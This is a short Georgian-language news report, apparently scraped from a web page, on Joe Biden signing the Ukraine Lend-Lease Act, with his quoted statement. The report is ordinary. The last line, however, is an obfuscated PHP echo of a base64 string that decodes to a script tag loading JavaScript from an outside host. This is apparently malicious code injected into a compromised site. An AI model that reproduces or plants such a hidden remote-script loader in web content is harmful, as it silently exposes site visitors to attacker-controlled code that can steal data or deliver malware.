celsiusi
ავერსი საქკაბელი
აშშ-ის პრეზიდენტმა, ჯო ბაიდენმა უკრაინის დემოკრატიის დაცვის ე.წ. ლენდ ლიზის აქტს ხელი მოაწერა. 
 
28 აპრილს აშშ-ის კონგრესმა ლენდ ლიზის პროგრამა დაამტკიცა, რომელიც საშუალებას მისცემს ვაშინგტონს, უკრაინას შეიარაღება უფრო სწრაფად და ეფექტური გზით გადასცეს.
 
„მე ხელს ვაწერ კანონს, რომელიც ძალისხმევის კიდევ ერთ მნიშვნელოვან ინსტრუმენტს გვაძლევს უკრაინის მთავრობისა და უკრაინელი ხალხის მხარდასაჭერად მათ ბრძოლაში ქვეყნისა და დემოკრატიის დასაცავად პუტინის სასტიკი ომის წინააღმდეგ. მინდა, მადლობა გადავუხადო კონგრესის წევრებს ამ კანონპროექტის დამტკიცებისთვის და ყველას, ვინც მხარი დაუჭირა ამ აქტს. ეს აქტი აჩვენებს, რომ უკრაინის მხარდაჭერა გადამწყვეტია ამ მომენტში. უკრაინელები ყოველდღე საკუთარი სიცოცხლით იხდიან და ისინი საკმაოდ დიდ ხანს იბრძვიან. სისასტიკე, რომელშიც მონაწილეობენ რუსები, ყოველგვარ ზღვარს სცდება. ამ ბრძოლის საფასური არ არის იაფი, თუმცა აგრესიის წინაშე დათმობა კიდევ უფრო ძვირია“, – განაცხადა ჯო ბაიდენმა.
 
ცნობისთვის, ლენდ ლიზის პროგრამა აშშ-მა ბოლოს მეორე მსოფლიო ომის დროს აამოქმედა.
679
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");